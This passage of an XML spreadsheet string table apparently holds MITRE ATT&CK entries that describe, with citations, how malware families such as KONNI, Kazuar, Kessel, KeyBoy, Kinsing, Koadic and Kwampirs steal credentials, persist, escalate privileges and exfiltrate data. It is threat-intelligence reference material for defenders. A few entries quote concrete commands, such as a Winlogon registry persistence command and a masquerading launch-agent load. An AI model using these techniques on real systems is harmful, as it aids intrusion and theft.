  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of running WMI queries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) bypassed UAC with the “AlwaysNotify” settings.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) had a feature to steal data from the clipboard.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified ComSysApp service to load the malicious DLL payload.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can steal profiles (containing credential information) from Firefox, Chrome, and Opera.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[KONNI](https://attack.mitre.org/software/S0356) has used certutil to download and decode base64 encoded strings.(Citation: Medium KONNI Jan 2020) </t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can delete files.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can download files and execute them on the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has the capability to perform keylogging.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) creates a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) used PowerShell to download and execute a specific 64-bit version of the malware.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut into the Startup folder to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used Rundll32 to execute its loader for privilege escalation purposes.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can take screenshots of the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>A version of [KONNI](https://attack.mitre.org/software/S0356) drops a Windows shortcut on the victim’s machine to establish persistence.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the IP address from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) can collect the username from the victim’s machine.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used HTTP for C2.(Citation: Talos Konni May 2017)</t>
  </si>
  <si>
    <t>[KONNI](https://attack.mitre.org/software/S0356) has used cmd.exe execute arbitrary commands on the infected host across different stages of the infection change.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to change firewall settings to allow a plug-in to be downloaded.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given filename on a victim.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to download and execute additional files.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to search for a given process name in processes currently running in the system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) creates a Registry Run key to establish persistence.(Citation: Zscaler Kasidet)(Citation: Microsoft Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to initiate keylogging and screen captures.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to identify any anti-virus installed on the infected system.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) has the ability to obtain a victim's system name and operating system version.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kasidet](https://attack.mitre.org/software/S0088) can execute commands using cmd.exe.(Citation: Zscaler Kasidet)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about opened windows.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used compromised WordPress blogs as C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can overwrite files with random data before deleting them.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uploads files from a specified directory to the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>If running in a Windows environment, [Kazuar](https://attack.mitre.org/software/S0265) saves a DLL to disk that is injected into the explorer.exe process to execute the payload. [Kazuar](https://attack.mitre.org/software/S0265) can also be configured to inject and execute within specific processes.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can accept multiple URLs for C2 servers.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can delete files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses FTP and FTPS to communicate with the C2 server.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) finds a specified directory, lists the files and metadata about those files.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) downloads additional plug-ins to load on the victim’s machine, including the ability to upgrade and replace its own binary.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) has used internal nodes on the compromised network for C2 communications.(Citation: Accenture HyperStack October 2020)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on local groups and members on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) stages command output and collected data in files before exfiltration.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about local groups and members.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) is obfuscated using the open source ConfuserEx protector. [Kazuar](https://attack.mitre.org/software/S0265) also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying and the &lt;code&gt;ps&lt;/code&gt; command.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a sub-key under several Registry run keys.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can sleep for a specific time and be set to communicate at specific intervals.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures screenshots of the victim’s screen.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) adds a .lnk file to the Windows startup folder.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) encodes communications to the C2 server in Base64.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on the system and local drives.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information about network adapters.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) gathers information on users.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses /bin/bash to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) captures images from the webcam.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses HTTP and HTTPS to communicate with the C2 server. [Kazuar](https://attack.mitre.org/software/S0265) can also act as a webserver and listen for inbound HTTP requests through an exposed API.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) uses cmd.exe to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kazuar](https://attack.mitre.org/software/S0265) can install itself as a new service.(Citation: Unit 42 Kazuar May 2017)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) can download additional software including [Cobalt Strike](https://attack.mitre.org/software/S0154) from servers on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious files.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious links.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed through malicious e-mail attachments.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed via e-mails containing a malicious link.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the &lt;code&gt;main&lt;/code&gt; function was launched.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has trojanized the &lt;sode&gt;ssh_login&lt;/code&gt; and &lt;code&gt;user-auth_pubkey&lt;/code&gt; functions to steal plaintext credentials.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487)'s configuration is hardcoded and RC4 encrypted within the binary.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the system architecture, OS version, and MAC address information.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) attempts to collect passwords from browsers.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to launch a file browser or explorer on the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses &lt;code&gt;-w Hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload. (Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a download and upload functionality.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a keylogger for intercepting credentials and keystrokes.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>In one version of [KeyBoy](https://attack.mitre.org/software/S0387), string obfuscation routines were used to hide many of the critical values referenced in the malware.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses PowerShell commands to download and execute payloads.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses custom SSL libraries to impersonate SSL in C2 traffic.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) has a command to perform screen grabbing.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can gather extended system information, such as information about the operating system, disks, and memory.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can determine the public or WAN IP address for the system.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) time-stomped its DLL in order to evade detection.(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) uses VBS scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) can launch interactive shells for communicating with the victim machine.(Citation: PWC KeyBoys Feb 2017)(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) installs a service pointing to a malicious DLL dropped to disk.(Citation: Rapid7 KeyBoy Jun 2013)</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) issues the command &lt;code&gt;reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”&lt;/code&gt; to achieve persistence.(Citation: PWC KeyBoys Feb 2017) (Citation: CitizenLab KeyBoy Nov 2016)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) prompts the users for credentials.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a Launch Agent to persist.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses a copy of tor2web proxy for HTTPS communications.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses Python for scripting to execute additional commands.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses the keychaindump project to read securityd memory.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) adds the setuid flag to a binary so it can easily elevate in the future.(Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>[Keydnap](https://attack.mitre.org/software/S0276) uses HTTPS for command and control.(Citation: synack 2016 review)</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched &lt;code&gt;bash_history&lt;/code&gt; for credentials.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has attempted to brute force hosts over SSH.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed with an Ubuntu container entry point that runs shell scripts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used crontab to download and run shell scripts every minute to ensure persistence.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was run through a deployed Ubuntu container.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) was executed in an Ubuntu container deployed via an open Docker daemon API.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used the find command to search for specific files.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has downloaded additional lateral movement scripts from C2.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used chmod to modify permissions on key files for use.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has searched for private keys.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used ps to list processes.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used a script to parse files like &lt;code&gt;/etc/hosts&lt;/code&gt; and SSH &lt;code&gt;known_hosts&lt;/code&gt; to discover remote systems.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has created and run a Bitcoin cryptocurrency miner.(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used SSH for lateral movement.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has used valid SSH credentials to access remote hosts.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kinsing](https://attack.mitre.org/software/S0599) has communicated with C2 over HTTP.(Citation: Aqua Kinsing April 2020)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use SSL and TLS for communications.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download files off the target system to send back to the server.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can perform process injection by using a reflective DLL.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can download additional files.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use MSHTA to serve additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by gathering domain controller hashes from NTDS.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan for open TCP ports on the target network.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can scan local network for open SMB.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Regsvr32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can enable remote desktop on the victim's machine.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use Rundll32 to execute additional payloads.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can gather hashed passwords by dumping SAM/SECURITY hive.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can run a command on another machine using [PsExec](https://attack.mitre.org/software/S0029).(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can retrieve information about the Windows domain.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can identify logged in users across the domain and views user sessions.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can open an interactive command-shell to perform command line functions on victim machines.(Citation: Github Koadic) [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (Jscript) and runs arbitrary shellcode .(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>[Koadic](https://attack.mitre.org/software/S0250) can use WMI to execute commands.(Citation: Github Koadic)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) trojan supports file deletion.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) payload is stored in a hidden directory at &lt;code&gt;/Users/Shared/.local/kextd&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t xml:space="preserve"> The [Komplex](https://attack.mitre.org/software/S0162) trojan creates a persistent launch agent called with &lt;code&gt;$HOME/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt; with &lt;code&gt;launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects a running process list.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses an 11-byte XOR algorithm to hide data.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The OsInfo function in [Komplex](https://attack.mitre.org/software/S0162) collects the current running username.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses HTTP POST requests.(Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>Before writing to disk, [Kwampirs](https://attack.mitre.org/software/S0236) inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) decrypts and extracts a copy of its main DLL payload when executing.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of domain groups with the command &lt;code&gt;net localgroup /domain&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses a large list of C2 servers that it cycles through until a successful connection is established.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of files and directories in C:\ with the command &lt;code&gt;dir /s /a c:\ &gt;&gt; "C:\windows\TEMP\[RANDOM].tmp"&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files from C2 servers.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of accounts with the command &lt;code&gt;net users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of users belonging to the local users and administrators groups with the commands &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net localgroup users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) establishes persistence by adding a new service with the display name "WMI Performance Adapter Extension" in an attempt to masquerade as a legitimate WMI service.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of network shares with the command &lt;code&gt;net share&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) downloads additional files that are base64-encoded and encrypted with another cipher.(Citation: Symantec Security Center Trojan.Kwampirs)</t>
  </si>
  <si>
